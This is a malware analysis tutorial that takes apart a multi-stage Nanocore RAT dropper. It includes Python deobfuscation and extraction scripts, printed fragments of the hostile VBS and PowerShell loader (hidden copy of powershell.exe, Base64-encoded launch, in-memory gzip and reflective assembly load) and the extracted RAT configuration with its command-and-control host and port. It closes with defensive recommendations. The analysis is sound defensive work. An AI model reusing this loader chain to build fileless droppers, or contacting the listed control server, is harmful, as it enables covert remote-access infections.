Nanocore Malicious Script Analysis
Word count: 1105 | 2025-08-24 07:48:34
Nanocore Malicious Script Analysis: Teaching Document
1. Sample Information
- SHA256: c6092b1788722f82280d3dca79784556df6b8203f4d8f271c327582dd9dcf6e1
- Download link: VirusShare
2. Sample Structure
The sample uses a four-layer nested structure:
- Outer VBS script
- Inner VBS script
- PowerShell script
- Nanocore RAT
3. VBS Script Analysis
3.1 Initial Deobfuscation
The original VBS script is padded with a large number of junk comment lines; filtering out every line that matches the regular expression ^(REM|').* leaves the core code.
3.2 Obfuscation Technique
The obfuscation relies mainly on the chr() function combined with arithmetic, for example:
chr(479808/&H1B90)
Decoding steps:
- Convert the hexadecimal literal &H1B90 to decimal: 7072
- Compute 479808/7072 ≈ 67.8
- Round to 68; chr(68) yields the character 'D'
3.3 Automated Extraction Script
Python can be used to batch-extract the obfuscated payload:
import re

def read_text(filename):
    with open(filename, 'r') as f:
        return f.read()

def calc(string):
    """Evaluate the arithmetic inside one chr() call.
    The right-hand operand is a hex literal (&H...), already rewritten as 0x... below."""
    if "/" in string:
        return int(string.split("/")[0]) / int(string.split("/")[-1], 16)
    elif "+" in string:
        return int(string.split("+")[0]) + int(string.split("+")[-1], 16)
    # Bare literal with no operator: decimal, or 0x-prefixed hex
    return int(string, 16) if string.startswith("0x") else int(string)

Nanocore_text = read_text('Nanocore.txt')
# Capture the expression inside each chr( ... ) call; VBScript is case-insensitive, so accept Chr( as well
pattern = re.compile(r'chr\(([^)]+)\)', re.IGNORECASE)
matchers = pattern.findall(Nanocore_text)
code = ""
for matcher in matchers:
    matcher = matcher.replace("&H", "0x")      # VBScript hex prefix -> Python hex prefix
    matcher = matcher.replace('chr(', '').replace(')', '')
    matcher = matcher.replace('CLng(', '')     # drop the CLng( wrapper; its ')' was not captured
    matcher = calc(matcher)
    # VBScript's Chr rounds its argument to the nearest Long (banker's rounding), which
    # Python's round() matches; int() would truncate 67.8 to 67 ('C') instead of 68 ('D')
    matcher = chr(round(matcher))
    code += matcher.replace('\n', '')
with open('Nanocore.vbs', 'w') as f:
    f.write(code)
4. VBS Core Functionality
4.1 Initialization
Dim scriptPath, scriptFolder, sourcePath, destinationPath, scriptNameWithoutExtension
Dim fso, shell
Set fso = CreateObject("Scripting.FileSystemObject")
- Creates a FileSystemObject for file operations
4.2 Gathering Script Information
scriptPath = WScript.ScriptFullName
scriptFolder = fso.GetParentFolderName(scriptPath)
scriptNameWithoutExtension = fso.GetFileName(scriptPath)
destinationPath = scriptFolder & "\" & scriptNameWithoutExtension & ".exe"
- Gets the path of the running script and builds the destination path by appending the .exe suffix (note that GetFileName keeps the original extension, so the result is <script>.vbs.exe)
4.3 Building the PowerShell Path
part1 = "%S"
part2 = "ystem"
[...]
fullPath = part1 & part2 & part3 & part4 & part5 & part6 & part7 & part8 & part9 & part10 & part11 & part12 & part13
- The concatenated string is the real path:
%SystemRoot%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
4.4 Copying PowerShell
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
strCommand = "cmd /c copy """ & sourcePath & """ """ & destinationPath & """ /Y"
Set objProcess = objWMIService.Get("Win32_Process")
objProcess.Create strCommand
- Uses WMI (Win32_Process.Create) to run a cmd copy command that places a copy of powershell.exe in the script's own directory
4.5 Setting File Attributes
Set file = fso.GetFile(destinationPath)
file.Attributes = 4 + 2 ' System (4) + Hidden (2)
4.6 Executing PowerShell
shell.Run destinationPath & " -enc [Base64-encoded command]"
- Launches the renamed PowerShell copy with a Base64-encoded command (-enc) to run the next stage
5. PowerShell Script Analysis
5.1 Getting the Current Process Path
$Cvokayktpr = [System.Diagnostics.Process]::GetCurrentProcess().MainModule.FileName.Replace('.exe','')
- Gets the path of the current process and strips the .exe suffix; since the copy was named <script>.vbs.exe (4.2), this is the path of the original VBS script
5.2 Reading the Last Line of the Script
$Zznkzyflgjw = get-content $Cvokayktpr | Select-Object -Last 1
$Cfxzis = [System.Convert]::FromBase64String($Zznkzyflgjw.Replace('REM ','').Replace('@','A'))
- Reads the last line of the script
- Removes "REM " and replaces "@" with "A"
- Base64-decodes the result
5.3 Decompressing the Gzip Data in Memory
$Kcxpqt = New-Object System.IO.MemoryStream(,$Cfxzis)
$Gcywezypgq = New-Object System.IO.MemoryStream
$Zqtwgobjxdw = New-Object System.IO.Compression.GzipStream $Kcxpqt,([IO.Compression.CompressionMode]::Decompress)
$Zqtwgobjxdw.CopyTo($Gcywezypgq)
- Decompresses the Gzip data entirely in memory
5.4 Loading and Executing the Assembly
[byte[]]$Cfxzis = $Gcywezypgq.ToArray()
[Array]::Reverse($Cfxzis)
$Fhzxwihzn = [System.AppDomain]::CurrentDomain.Load($Cfxzis)
$Adcoj = $Fhzxwihzn.EntryPoint
[System.Delegate]::CreateDelegate([Action],$Adcoj.DeclaringType,$Adcoj.Name).DynamicInvoke() | Out-Null
- Reverses the byte array
- Loads it as a .NET assembly
- Dynamically invokes the entry-point method
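As an added example (not code from the original post), the following Python reproduces the decoding chain of section 5 so that the embedded assembly can be carved out of the dropped file for static analysis without ever being executed. The dropped-file text and the fake "MZ" blob inside it are constructed here for demonstration; the function names are my own.

```python
import base64
import gzip
import hashlib

def extract_stage_payload(text):
    """Mirror the PowerShell loader's steps: take the last line, strip the
    'REM ' prefix, turn '@' back into 'A', Base64-decode, gunzip in memory,
    and finally reverse the byte order."""
    last_line = text.rstrip("\r\n").splitlines()[-1]
    # '@' is not in the Base64 alphabet, so the substitution is lossless to undo
    encoded = last_line.replace("REM ", "").replace("@", "A")
    compressed = base64.b64decode(encoded)
    decompressed = gzip.decompress(compressed)
    return decompressed[::-1]

def describe_payload(payload):
    """Triage facts an analyst records before handing the blob to a .NET decompiler."""
    return {
        "is_pe": payload[:2] == b"MZ",
        "size": len(payload),
        "sha256": hashlib.sha256(payload).hexdigest(),
    }

# Constructed sample: a stand-in 'assembly' (only the MZ magic is realistic),
# wrapped exactly the way the loader expects: reversed, gzipped, Base64,
# 'A' swapped for '@', and hidden on the final line behind a REM comment.
FAKE_ASSEMBLY = b"MZ" + b"\x00" * 14 + b"constructed-sample-not-a-real-binary"
_encoded = base64.b64encode(gzip.compress(FAKE_ASSEMBLY[::-1])).decode()
SAMPLE_DROPPED_FILE = (
    "Dim x\n"
    "' junk comment line, filtered out by ^(REM|').* during cleanup\n"
    "REM " + _encoded.replace("A", "@") + "\n"
)

if __name__ == "__main__":
    blob = extract_stage_payload(SAMPLE_DROPPED_FILE)
    print(describe_payload(blob))
```

Pointing extract_stage_payload at the real .vbs file yields the bytes that [System.AppDomain]::CurrentDomain.Load would have received, ready for a .NET decompiler or a NanoCore config extractor.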
6. Nanocore RAT Analysis
6.1 Extracted Configuration
{
  "NanoCore": {
    "KeyboardLogging": ["True"],
    "BuildTime": ["2024-08-08 05:36:51.971568"],
    "Version": ["1.2.2.0"],
    "Mutex": ["5a71ca6b-558e-46f1-b51d-f5c300aa04cd"],
    "DefaultGroup": ["D-Online23rd"],
    "PrimaryConnectionHost": ["builderlloulirabaonline23rd.mywire.org"],
    "BackupConnectionHost": ["127.0.0.1"],
    "ConnectionPort": ["7077"],
    "RunOnStartup": ["False"],
    "RequestElevation": ["False"],
    "BypassUserAccountControl": ["False"],
    "ClearZoneIdentifier": ["True"],
    "ClearAccessControl": ["False"],
    "SetCriticalProcess": ["False"],
    "PreventSystemSleep": ["True"],
    "ActivateAwayMode": ["False"],
    "EnableDebugMode": ["False"],
    "RunDelay": ["0"],
    "ConnectDelay": ["4000"],
    "RestartDelay": ["5000"],
    "TimeoutInterval": ["5000"],
    "KeepAliveTimeout": ["30000"],
    "MutexTimeout": ["5000"],
    "LanTimeout": ["2500"],
    "WanTimeout": ["8000"],
    "BufferSize": ["65535"],
    "MaxPacketSize": ["10485760"],
    "GCThreshold": ["10485760"],
    "UseCustomDnsServer": ["True"],
    "PrimaryDnsServer": ["8.8.8.8"],
    "BackupDnsServer": ["8.8.4.4"],
    "cncs": [["builderlloulirabaonline23rd.mywire.org:7077", "127.0.0.1:7077"]]
  }
}
6.2 Technical Characteristics
- Multiple layers of obfuscation and nested execution
- Fileless technique
- In-memory loading of the malicious code
- A legitimate PowerShell process used as the carrier
- A fake PDF icon to make the file look harmless
7. Defensive Recommendations
- Monitor anomalous PowerShell and WMI activity
- Restrict script execution permissions
- Detect Base64 decoding and Gzip in-memory loading behaviour
- Monitor unusual network connections (port 7077 in particular)
- Check system processes for abnormal memory operations
- Watch for creation of the mutex 5a71ca6b-558e-46f1-b51d-f5c300aa04cd
- Block access to the mywire.org domain